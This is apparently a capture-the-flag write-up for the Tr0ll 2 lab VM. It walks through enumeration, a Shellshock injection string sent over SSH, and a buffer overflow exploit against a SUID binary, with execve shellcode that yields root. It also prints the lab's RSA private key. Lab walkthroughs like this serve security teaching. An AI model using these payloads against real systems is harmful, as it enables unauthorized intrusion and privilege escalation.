
I rooted Tr0ll 1, so it would have been rude not to try the second VM in the Tr0ll series. Tr0ll 2 requires a buffer overflow for local privilege escalation, whereas the first VM didn't require any exploitation at all. Like the first VM, though, I'd say this challenge is more a case of guessing credentials and trying things you think probably won't work.

Description

The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :)

Difficulty is beginner++ to intermediate.

##Enumeration

The enumeration process started with a full TCP port scan with service and OS detection:

```
root:~# nmap -p 1-65535 -sV -sS -A -T4 172.31.31.6

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-02 19:24 EST

Host is up (0.0026s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
|   2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_  256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.8
Network Distance: 2 hops
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds
```

###Service Enumeration

| Port | Service | Version Detection |
|------|---------|-------------------|
| TCP 21 | FTP | vsftpd 2.0.8 or later |
| TCP 22 | SSH | OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0) |
| TCP 80 | HTTP | Apache httpd 2.2.22 ((Ubuntu)) |

###SSH Enumeration

Zoning out while watching the Nmap scan complete, I noticed the hostname was Tr0ll. I attempted to log in via SSH as Tr0ll with the password Tr0ll, and it worked! But I was instantly booted off; I tried a few things and nothing worked, so I moved on to FTP.

###FTP Enumeration

I tried the same credentials against FTP and discovered a zip called lmao.zip in the FTP root.

```
root:~# ftp 172.31.31.6
Connected to 172.31.31.6
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (172.31.31.6:root): Tr0ll
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get lmao.zip
local: lmao.zip remote: lmao.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lmao.zip (1474 bytes).
226 Transfer complete.
1474 bytes received in 0.02 secs (60.6 kB/s)
ftp> exit
221 Goodbye.
```

Attempting to extract lmao.zip failed: it prompted for a password for the file noob inside the archive.

On to the next service then…

###HTTP Enumeration

After a quick look in the browser, the nmap http-enum script was run against port 80:

```
root:~# nmap --script=http-enum -p80 -n 172.31.31.6

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-2 18:40 GMT
Nmap scan report for 172.31.31.6
Host is up (0.00046s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-enum:
|_  /robots.txt: Robots file

Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
```

Entering the /robots.txt URL in the browser rendered:

```
User-agent: *
Disallow: /noob
Disallow: /nope
Disallow: /try_harder
Disallow: /keep_trying
Disallow: /isnt_this_annoying
Disallow: /nothing_here
Disallow: /404
Disallow: /LOL_at_the_last_one
Disallow: /trolling_is_fun
Disallow: /zomg_is_this_it
Disallow: /you_found_me
Disallow: /I_know_this_sucks
Disallow: /You_could_give_up
Disallow: /dont_bother
Disallow: /will_it_ever_end
Disallow: /I_hope_you_scripted_this
Disallow: /ok_this_is_it
Disallow: /stop_whining
Disallow: /why_are_you_still_looking
Disallow: /just_quit
Disallow: /seriously_stop
```

The leading slashes were stripped off with sed (`sed 's./..g' robots.txt`, using `.` as the delimiter so every `/` is deleted) to produce a 21-word list, and dirb was then used to check each path:

```
-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Sat Jan  3 08:08:15 2015
URL_BASE: http://172.31.31.6/
WORDLIST_FILES: robots.txt

-----------------

GENERATED WORDS: 21

---- Scanning URL: http://172.31.31.6/ ----
+ http://172.31.31.6//noob ( CODE:301|SIZE:309 )
+ http://172.31.31.6//keep_trying ( CODE:301|SIZE:316 )
+ http://172.31.31.6//dont_bother ( CODE:301|SIZE:316 )
+ http://172.31.31.6//ok_this_is_it ( CODE:301|SIZE:318 )

-----------------
DOWNLOADED: 21 - FOUND: 4
```
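The sed one-liner above only strips slashes, so it also leaves the `User-agent` and `Disallow:` tokens in the wordlist if the file is in the usual one-rule-per-line format. As an added example (not part of the original post), here is a small robots.txt-to-wordlist parser that handles comments, `Allow` rules, wildcard patterns and duplicates; the sample input is constructed to mirror the entries above and is not the file served by the VM:

```python
"""Added example: build a dirb/gobuster wordlist from a robots.txt.
Not the walkthrough's own sed command; the sample below is constructed."""

import re

# Constructed sample: the Disallow entries listed above, plus a comment,
# an Allow rule, a duplicate and a wildcard rule to exercise the filtering.
ROBOTS_SAMPLE = """# tr0ll says hi
User-agent: *
Allow: /
Disallow: /noob
Disallow: /nope
Disallow: /try_harder
Disallow: /keep_trying
Disallow: /isnt_this_annoying
Disallow: /nothing_here
Disallow: /404
Disallow: /LOL_at_the_last_one
Disallow: /trolling_is_fun
Disallow: /zomg_is_this_it
Disallow: /you_found_me
Disallow: /I_know_this_sucks
Disallow: /You_could_give_up
Disallow: /dont_bother
Disallow: /will_it_ever_end
Disallow: /I_hope_you_scripted_this
Disallow: /ok_this_is_it
Disallow: /stop_whining
Disallow: /why_are_you_still_looking
Disallow: /just_quit
Disallow: /seriously_stop
Disallow: /noob
Disallow: /*.php$
"""

_RULE = re.compile(r"^\s*(allow|disallow)\s*:\s*(\S*)", re.IGNORECASE)


def robots_paths(text, include_allow=False):
    """Return the unique paths named by Disallow (and optionally Allow)
    rules, leading/trailing slashes removed, in file order.  Rules that
    contain wildcards are patterns rather than paths and are skipped."""
    seen, out = set(), []
    for line in text.splitlines():
        line = line.split("#", 1)[0]          # drop comments
        m = _RULE.match(line)
        if not m:
            continue                          # User-agent, Sitemap, blank...
        kind, path = m.group(1).lower(), m.group(2)
        if kind == "allow" and not include_allow:
            continue
        if "*" in path or "$" in path:
            continue                          # wildcard pattern, not a path
        path = path.strip("/")
        if path and path not in seen:
            seen.add(path)
            out.append(path)
    return out


if __name__ == "__main__":
    # One path per line; then:  dirb http://172.31.31.6/ robots-wordlist.txt
    with open("robots-wordlist.txt", "w") as fh:
        fh.write("\n".join(robots_paths(ROBOTS_SAMPLE)) + "\n")
```

The resulting list is the 21 directory names dirb was fed above; the duplicate `/noob` and the `/*.php$` pattern are dropped rather than wasting requests.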

All four 301'd to a directory listing that rendered the same image.

Nothing exciting was in the page source apart from the text:

```
What did you really think to find here? Try Harder
```

cat_the_troll.jpg was downloaded from each of the above locations and examined.

`ls -la` showed a slightly different file size for one of the images, so I ran each of the files through `cat` (cat-ing the cat, sorry). The larger one had a string appended to the end of the image data:

```
Look Deep within y0ur_self for the answer
```
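Text tacked onto a JPEG like this sits after the End Of Image marker (FF D9), which is why `cat` shows it and the image still displays. As an added example (not code from the original post), the parser below walks the JPEG marker segments to cut off exactly the appended bytes, and flags which of a set of files carries a trailer. The image bytes are constructed minimal JPEGs, not the real cat_the_troll.jpg files, and the file names are placeholders:

```python
"""Added example: detect and extract data appended after a JPEG's EOI marker.
Sample images are constructed in-line; they are not the VM's real files."""

import hashlib


def jpeg_trailer(data):
    """Return the bytes that follow the JPEG's EOI marker (b'' if none).

    The marker segments are walked instead of using data.rfind(b'\\xff\\xd9'):
    an appended blob that itself contains FF D9 (a zip, another JPEG) would
    make rfind report too short a trailer, and a plain find() would stop at
    the EOI of an EXIF thumbnail embedded before the real scan data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    i = 2
    while i + 1 < len(data):
        if data[i] != 0xFF:
            raise ValueError("expected a marker at offset %d" % i)
        marker = data[i + 1]
        if marker == 0xFF:                           # fill byte before a marker
            i += 1
            continue
        if marker == 0xD9:                           # EOI: the rest is trailer
            return data[i + 2:]
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # standalone markers
            i += 2
            continue
        seg_len = int.from_bytes(data[i + 2:i + 4], "big")
        i += 2 + seg_len                             # skip the segment body
        if marker == 0xDA:                           # SOS: skip entropy-coded data
            while i + 1 < len(data):
                nxt = data[i + 1]
                if data[i] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break                            # a real marker (EOI, DHT, SOS...)
                i += 1
    raise ValueError("no EOI marker found")


def odd_ones_out(images):
    """Given {name: bytes}, return {name: (size, sha256 prefix, trailer)} for
    every image that carries appended data."""
    report = {}
    for name, data in images.items():
        trailer = jpeg_trailer(data)
        if trailer:
            digest = hashlib.sha256(data).hexdigest()[:12]
            report[name] = (len(data), digest, trailer)
    return report


# Constructed minimal JPEG: SOI, JFIF APP0, one SOS with a few bytes of scan
# data (including a stuffed FF 00 and an FF D0 restart marker), then EOI.
CLEAN_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00"
    + b"\x12\x34\xff\x00\x56\xff\xd0\x78"
    + b"\xff\xd9"
)
TROLL_TRAILER = b"Look Deep within y0ur_self for the answer\n"
BINARY_TRAILER = b"PK\x03\x04\xff\xd9junk"      # contains FF D9 to fool rfind

# Placeholder names; which real directory held the odd image is not recorded.
SAMPLE_IMAGES = {
    "cat_the_troll_1.jpg": CLEAN_JPEG,
    "cat_the_troll_2.jpg": CLEAN_JPEG,
    "cat_the_troll_3.jpg": CLEAN_JPEG + BINARY_TRAILER,
    "cat_the_troll_4.jpg": CLEAN_JPEG + TROLL_TRAILER,
}

if __name__ == "__main__":
    for name, (size, digest, trailer) in odd_ones_out(SAMPLE_IMAGES).items():
        print("%-20s %4d bytes sha256=%s trailer=%r" % (name, size, digest, trailer))
```

On real files, `open(path, "rb").read()` replaces the constructed bytes; comparing sizes and hashes first, as `ls -la` did here, is still the quickest way to spot the odd one out before parsing anything.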

I tried this as the password for the previously downloaded lmao.zip, no luck. I then tried y0ur_self as a web path, as on Tr0ll 1.

Success: the web directory contained a text file, http://172.31.31.6/y0ur_self/answer.txt. Scrolling through it in the browser, the file looked base64 encoded.

```
root:~# wget http://172.31.31.6/y0ur_self/answer.txt
```

Decoding the file revealed it was massive, so the following was used to decode it and sort the lines by length (awk prefixes each line with its length, and `sort -nr` puts the longest first):

```
root:~# base64 -d answer.txt > answer-decoded.txt && awk '{print length, $0;}' answer-decoded.txt | sort -nr | less

30 ItCantReallyBeThisEasyRightLOL
```

The top line looked promising, so I tried ItCantReallyBeThisEasyRightLOL as the password for lmao.zip:

```
root:~# unzip lmao.zip
Archive:  lmao.zip
[lmao.zip] noob password:
  inflating: noob
```

Yes!

The contents of noob:

```
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAsIthv5CzMo5v663EMpilasuBIFMiftzsr+w+UFe9yFhAoLqq
yDSPjrmPsyFePcpHmwWEdeR5AWIv/RmGZh0Q+Qh6vSPswix7//SnX/QHvh0CGhf1
/9zwtJSMely5oCGOujMLjDZjryu1PKxET1CcUpiylr2kgD/fy11Th33KwmcsgnPo
q+pMbCh86IzNBEXrBdkYCn222djBaq+mEjvfqIXWQYBlZ3HNZ4LVtG+5in9bvkU5
z+13lsTpA9px6YIbyrPMMFzcOrxNdpTY86ozw02+MmFaYfMxyj2GbLej0+qniwKy
e5SsF+eNBRKdqvSYtsVE11SwQmF4imdJO0buvQIDAQABAoIBAA8ltlpQWP+yduna
u+W3cSHrmgWi/Ge0Ht6tP193V8IzyD/CJFsPH24Yf7rX1xUoIOKtI4NV+gfjW8i0
gvKJ9eXYE2fdCDhUxsLcQ+wYrP1j0cVZXvL4CvMDd9Yb1JVnq65QKOJ73CuwbVlq
UmYXvYHcth324YFbeaEiPcN3SIlLWms0pdA71Lc8kYKfgUK8UQ9Q3u58Ehlxv079
La35u5VH7GSKeey72655A+t6d1ZrrnjaRXmaec/j3Kvse2GrXJFhZ2IEDAfa0GXR
xgl4PyN8O0L+TgBNI/5nnTSQqbjUiu+aOoRCs0856EEpfnGte41AppO99hdPTAKP
aq/r7+UCgYEA17OaQ69KGRdvNRNvRo4abtiKVFSSqCKMasiL6aZ8NIqNfIVTMtTW
K+WPmz657n1oapaPfkiMRhXBCLjR7HHLeP5RaDQtOrNBfPSi7AlTPrRxDPQUxyxx
n48iIflln6u85KYEjQbHHkA3MdJBX2yYFp/w6pYtKfp15BDA8s4v9HMCgYEA0YcB
TEJvcW1XUT93ZsN+lOo/xlXDsf+9Njrci+G8l7jJEAFWptb/9ELc8phiZUHa2dIh
WBpYEanp2r+fKEQwLtoihstceSamdrLsskPhA4xF3zc3c1ubJOUfsJBfbwhX1tQv
ibsKq9kucenZOnT/WU8L51Ni5lTJa4HTQwQe9A8CgYEAidHV1T1g6NtSUOVUCg6t
0PlGmU9YTVmVwnzU+LtJTQDiGhfN6wKWvYF12kmf30P9vWzpzlRoXDd2GS6N4rdq
vKoyNZRw+bqjM0XT+2CR8dS1DwO9au14w+xecLq7NeQzUxzId5tHCosZORoQbvoh
ywLymdDOlq3TOZ+CySD4/wUCgYEAr/ybRHhQro7OVnneSjxNp7qRUn9a3bkWLeSG
th8mjrEwf/b/1yai2YEHn+QKUU5dCbOLOjr2We/Dcm6cue98IP4rHdjVlRS3oN9s
G9cTui0pyvDP7F63Eug4E89PuSziyphyTVcDAZBriFaIlKcMivDv6J6LZTc17sye
q51celUCgYAKE153nmgLIZjw6+FQcGYUl5FGfStUY05sOh8kxwBBGHW4/fC77+NO
vW6CYeE+bA2AQmiIGj5CqlNyecZ08j4Ot/W3IiRlkobhO07p3nj601d+OgTjjgKG
zp8XZNG8Xwnd5K59AVXZeiLe2LGeYbUKGbHyKE3wEVTTEmgaxF4D1g==
-----END RSA PRIVATE KEY-----
```

##SSH Shellshock

Attempting to log in with the discovered key failed with a message saying TRY HARDER LOL!.

I tried to feed it commands by tagging them onto the end of the ssh command line; the connection hung, then dropped with no message.

I googled some Shellshock options and managed to spawn a shell with:

```sh
ssh -i noob noob@172.31.31.6 '() { :;}; /bin/bash'
```

```
root:~# ssh -i noob noob@172.31.31.6 '() { :;}; /bin/bash'
id
uid=1002(noob) gid=1002(noob) groups=1002(noob)
```

Why this works: the key is accepted, but the account is evidently restricted to a forced command (which is what prints TRY HARDER LOL! and drops the connection). sshd passes whatever command the client asked for to that forced command in the SSH_ORIGINAL_COMMAND environment variable, and a Shellshock-vulnerable bash (CVE-2014-6271) treats any environment variable whose value starts with `() {` as a function definition and executes whatever follows the closing brace, here `/bin/bash`. The resulting shell has no tty, so there is no prompt, but commands such as `id` still run.

##Local Enumeration

Transferred my local enumeration script to the target, which flagged the following directories under its "Sticky Bit" check (the `s` in the owner execute slot is actually the setuid bit, not the sticky bit, and setuid on a directory has no effect on Linux, but the names made them worth a look):

```
#########################################
## Sticky Bit ##
#########################################
drwsr-xr-x 3 root root 4096 Dec 29 19:00 /nothing_to_see_here
drwsr-xr-x 5 root root 4096 Oct  4 22:36 /nothing_to_see_here/choose_wisely
drwsr-xr-x 2 root root 4096 Oct  5 21:19 /nothing_to_see_here/choose_wisely/door2
drwsr-xr-x 2 root root 4096 Oct  5 21:18 /nothing_to_see_here/choose_wisely/door3
drwsr-xr-x 2 root root 4096 Oct  4 22:19 /nothing_to_see_here/choose_wisely/door1
```

Each of the door directories contained a file called r00t. `du -sh *` in the parent directory choose_wisely showed one of the files was larger, so I started there.

`od -S 1 r00t` (print every run of one or more printable characters) was run against each of the files; the largest contained:

```
0017545 bof.c
0017553 __init_array_end
0017574 _DYNAMIC
0017605 __init_array_start
0017630 _GLOBAL_OFFSET_TABLE_
0017656 __libc_csu_fini
0017676 __i686.get_pc_thunk.bx
0017725 data_start
0017740 printf@@GLIBC_2.0
0017762 _edata
0017771 _fini
0017777 …@@GLIBC_2.0
0020021 __DTOR_END__
0020036 __data_start
0020053 __gmon_start__
0020072 exit@@GLIBC_2.0
0020112 __dso_handle
0020127 _IO_stdin_used
0020146 …@@GLIBC_2.0
0020203 __libc_csu_init
```

bof.c is a pretty good indication that a buffer overflow is the next logical step (unless it's more tr0lling).

##Exploit Development

###Fuzzing

I started by fuzzing with 300 A's:

```
root:~# ./r00t $(python -c 'print "A" *300')
Segmentation fault
```

Bangin'. 250 A's produced no crash, so I added 10 at a time (subtracting when it overshot): the segfault first appeared at 268 bytes, and at 269 the error changed to Illegal instruction, so the saved return address starts at offset 268.

Using gdb I located the address held in ESP at the crash:

```
(gdb) i r esp
esp            0xbffffb80	0xbffffb80
```

Padded with some NOPs for a reliable landing, overwrote EIP with the ESP address and tagged shellcode on the end to execute a shell. The ESP value works as the return address because `ret` pops the overwritten saved EIP and leaves ESP pointing at the bytes immediately after it, i.e. the start of the NOP sled.

###Final Exploit

```sh
./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90" * 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
```

The address is written little-endian (0xbffffb80 becomes \x80\xfb\xff\xbf) and the shellcode is a 23-byte Linux x86 execve("/bin//sh") stub.

Note: a SUID binary run under gdb does not keep its elevated privileges (the kernel does not honour the setuid bit for a process being traced by an unprivileged debugger), so the exploit has to be run outside gdb or the shell spawns as the unprivileged user. gdb also changes the environment (it sets LINES and COLUMNS and runs the program by absolute path), which shifts the stack slightly; if an address found in gdb misses outside it, lengthen the NOP sled or run both under `env -i`.

The r00t binaries in choose_wisely/door* get rotated between the doors; the largest one is the vulnerable binary, so check with `du` before running the exploit.

```
root:~# du -sh *
12K     door1
12K     door2
16K     door3
root:~# cd door3
root:~# ./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90" * 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
root:~# whoami
root
root:~# cat /root/Proof.txt
You win this time young Jedi...
a70354f0258dcc00292c72aab3c8b1e4
```


##Thanks

Thanks to @maleus21 for creating this VM challenge.